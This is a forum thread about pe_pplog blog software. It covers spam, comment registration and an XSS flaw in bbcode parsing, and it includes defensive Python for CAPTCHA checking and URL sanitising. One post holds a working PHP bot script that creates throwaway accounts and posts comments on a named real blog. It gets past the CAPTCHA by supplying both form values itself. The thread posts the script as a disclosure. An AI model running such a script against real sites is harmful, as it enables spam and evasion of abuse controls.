Puppy Linux Discussion Forum
pe_pplog v2.1b bugfixes!
Page 5 of 5 [70 Posts]
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Wed 04 Dec 2013, 14:55    Post subject: true  

will do that once I'm back from travelling

Until then, all the other bugfixes and features I described are in v2.1b.

I also put the blog up on github (username: efiabruni); feel free to play around. I'll be camping in Patagonia.
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Tue 10 Dec 2013, 08:57    Post subject: changes on github  

The last four days I spent on a ferry and had time to play with the pplog.
I made the following changes to the pe_pplog on github:

Added comment preview option for the admin page
Added the preview comment button on the preview comment page (now comment can be previewed again and again and again)
Added a check for double posts of comments

Changed files are: Pe_pplog.pl; pe_admin.pl and pe_Config.pl
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7084
Location: Perth, Western Australia

PostPosted: Fri 13 Dec 2013, 10:59    Post subject:  

efia,
I would appreciate your suggestions about what I should do.

I have been forced to disable comments on my blog, as someone has persisted in posting pornography comments.

I have been deleting them, but the person is persisting in posting more.

I was wondering how difficult it would be to implement email verification to register to post.

One way it could work is this: when a user wants to post a comment, they first have to click a "Register" link. They provide their email address, to which their desired username and password are sent.

A log can be kept of usernames and email addresses, and the banning system can be expanded to ban users based on their email address.

Perhaps there are other ways of doing it.

http://bkhome.org/news/
anikin

Joined: 10 May 2012
Posts: 529

PostPosted: Fri 13 Dec 2013, 12:15    Post subject:  

Barry wrote:
Due to the moron named "Author", I have been forced to disable comments

That moron has many names: 'mafur', 'simargl13', 'simargl29' etc. He posted spam and pron on this forum too. Looks like he has a severe mental pathology and needs urgent medical attention.
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Fri 13 Dec 2013, 22:20    Post subject:  

Some people are depressingly destructive. I'm on holiday at the moment, but will look into it once I'm home. If someone has ideas, feel free to fork the blog on github!
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Sun 15 Dec 2013, 15:33    Post subject: branching out  

I created a branch called comment_registration on github.
In this branch I changed the pe_pplog.pl file to:
not accept comments from unregistered users
send a new mail with a registration request to the admin if a new user tries to post

The admin has to manually edit the useres.ppl.data file. The syntax is: username'encrypted password"username2'encrypted password2"...

This is a quick & ugly fix.
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Mon 27 Jan 2014, 05:29    Post subject: comment registration  

I have updated the branch comment_registration on https://github.com/efiabruni/pe_pplog to make it possible for users to register and for the admin to block users.

I could not test it thoroughly as I don't have sendmail or similar. I use a simple regex for email validation; this is not the most secure way to use sendmail, please use with care.

This will not be part of the official pe_pplog.
gungsukma

Joined: 18 Sep 2011
Posts: 17

PostPosted: Fri 07 Feb 2014, 00:30    Post subject:  

Code:
I am bot   Posted on 7 Feb 2014, 12:09 by x6255
Barry should use REAL CAPTCHA.


I'm the one who posted that on http://bkhome.org/news/?viewDetailed=00055

This is the script I used (I used PHP, but it will be easy to convert to another language).

Code:
<?php
set_time_limit(100);

// Random username
$random = 'x'.rand(1000, 9999);
echo "Your username: $random<br/>";

// Make email adress
file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
echo "Your email: $random@opentrashbox.org<br/>";

// Register to Barry's blog, Wait for email
file_get_contents("http://bkhome.org/news/?do=register&username=$random&email=$random@opentrashbox.org&originalCode=AAAAAAAA&code=AAAAAAAA&process=register&Submit=Register");
sleep(30);

// Read inbox, Get the password
$contents = file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
preg_match("/password:\s*(\d+)/", $contents, $match);
$password = $match[1];
echo "Your password: $password<br/>";

// Add comment
file_get_contents("http://bkhome.org/news/?viewDetailed=00055&title=I+am+bot&author=$random&content=Barry+should+use+REAL+CAPTCHA.&originalCode=9999999&code=9999999&pass=$password&postTitle=Comments+are+back&sendComment=00055&Submit=Add+Comment");
echo "Barry should use *real captcha*.<br/>";


With that script, I can make and register a random username and a random email address. If someone blocks one, I'll make another (thanks, OpenTrashBox.org!).

But the one thing I want to show is the Security Code: you can trick it!
In the script, I don't even bother to read the security code; I just need to change the values of the form elements originalCode and code, and then I can bypass the security code. These parts:
> originalCode=AAAAAAAA&code=AAAAAAAA
> originalCode=9999999&code=9999999

This is my suggestion:
- Just accept email registration from GMail.com and Yahoo.com or any reputable email service
- Check the pattern of the username part of the email address; just accept alphanumerics, dots, and underscores.
- For GMail, remove all dots and labels in the email username (gungsukma@gmail.com, g.ung.suk.ma@gmail.com, gungsukma+bla.bla@gmail.com are all the same user).
- Use REAL CAPTCHA when registering and adding a comment
- Disable the comments on the blog now; I have leaked the bot source code.

Oh, "gungsukma@gmail.com" is not mine.
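A server-side check of the kind these suggestions (and Barry's ban-by-email idea above) call for, written here in Python as an added example that is not part of pe_pplog or of anyone's posted code: the expected security code is kept only on the server under a one-time challenge id, so a submission that fills in code and originalCode with values of its own choosing fails, and e-mail addresses are canonicalised (Gmail dots and +labels folded away, local part limited to alphanumerics, dots and underscores) before the disposable-domain and ban checks. The disposable-domain set is a constructed sample, not the branch's real block list.

```python
import hmac
import re
import secrets

# Constructed sample block list (assumption): the real list lives in the
# comment_registration branch and is not reproduced here.
DISPOSABLE_DOMAINS = {"opentrashbox.org"}
GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}
LOCAL_PART_RE = re.compile(r"[a-z0-9._]+")


def canonical_email(addr):
    """Return a canonical address, or None if it is rejected."""
    addr = addr.strip().lower()
    if addr.count("@") != 1:
        return None
    local, domain = addr.split("@")
    if domain in DISPOSABLE_DOMAINS:
        return None
    if domain in GMAIL_DOMAINS:
        # Gmail ignores dots and anything after '+', so fold them away
        # before the pattern check and the ban-list comparison.
        local = local.split("+", 1)[0].replace(".", "")
    if not LOCAL_PART_RE.fullmatch(local):
        return None
    return f"{local}@{domain}"


def registration_allowed(addr, banned):
    """banned: set of canonical addresses (ban users by e-mail)."""
    canon = canonical_email(addr)
    return canon is not None and canon not in banned


# challenge id -> expected answer; kept server-side only, never in the form.
_challenges = {}


def issue_challenge():
    """Return (challenge_id, answer). The form carries only the opaque id;
    the answer is what the CAPTCHA image shows and is never a form field."""
    cid = secrets.token_hex(16)
    answer = f"{secrets.randbelow(10**6):06d}"
    _challenges[cid] = answer
    return cid, answer


def verify_challenge(cid, submitted):
    """One-time check against the stored answer, in constant time."""
    expected = _challenges.pop(cid, None)
    if expected is None:
        return False
    return hmac.compare_digest(expected, submitted.strip())
```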
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Wed 12 Feb 2014, 16:45    Post subject: re: bots  

I am aware that the captcha is suboptimal, therefore there is also the "security question" option, which does not suffer from the same vulnerability and could even be set as a password.

Changes to comment_registration:
added disposable email services to the block list by default
stricter rules for email validation

Comment registration is never going to be an official feature; if someone feels like playing around with it, the code is on github on the branch comment_registration.
I simply do not have enough interest in this particular problem to muck around with it. I'd rather create galleries and css animations and stuff.

Again, the easiest and safest way is to use the security question as a password and only give the answer to people you trust. If it is broken into, change it.

Also, before someone got a personal grudge and went out of their way to post spam, no bot got past the former security features of the pplog in the 2 years that I have been using it, nor was it a problem for Barry until now.
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Tue 01 Apr 2014, 05:18    Post subject: security issue  

There is a security issue with having bbcode enabled in comments in all the pplogs (original, SJPPlog and this one).

Due to very permissive parsing of the bbcode it is possible to insert javascript in comments when posting a link or a picture.
See http://tine.pagekite.me/pe_pplog.pl/?viewDetailed=00047 for an example. This makes comments vulnerable to XSS attacks.

My advice is to disable bbcode on the comments of ALL versions of the PPLOG.

What is needed:
URL / SRC validating and escaping
strict rules for which attributes are allowed, validating and escaping
additional html escaping

I will fix this properly in the coming weeks.
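The three items in the list above (URL/SRC validation and escaping, a strict rule for what the tag may carry, and HTML escaping of everything else), as an added example in Python that is not pe_pplog's Perl code or the author's fix: only [url], [url=...] and [img] are recognised, a link or image is emitted only when its target parses as http(s) with a host and contains no quote, angle bracket or control character, and all other text is HTML-escaped.

```python
import html
import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}


def safe_url(raw):
    """Return the URL if it is http(s) with a host and free of quotes,
    angle brackets and control characters; otherwise None."""
    raw = raw.strip()
    if any(c in "\"'<>" or ord(c) < 32 for c in raw):
        return None
    parts = urlsplit(raw)          # urlsplit lower-cases the scheme
    if parts.scheme not in SAFE_SCHEMES or not parts.netloc:
        return None
    return raw


# Only these tags are recognised; any other bracket text stays literal.
TAG_RE = re.compile(
    r"\[url(?:=([^\]]*))?\](.*?)\[/url\]|\[img\](.*?)\[/img\]", re.I | re.S)


def _render_url(target, text):
    url = safe_url(target if target is not None else text)
    if url is None:
        return html.escape(text)   # drop the link, keep the escaped text
    return f'<a href="{html.escape(url)}" rel="nofollow">{html.escape(text)}</a>'


def _render_img(src):
    url = safe_url(src)
    if url is None:
        return html.escape(src)    # not a usable image URL: show as text
    return f'<img src="{html.escape(url)}" alt="">'


def render_comment(text):
    """Escape everything outside recognised tags; emit tags only with
    validated, attribute-escaped URLs (no other attributes allowed)."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        if m.group(3) is not None:
            out.append(_render_img(m.group(3)))
        else:
            out.append(_render_url(m.group(1), m.group(2)))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)
```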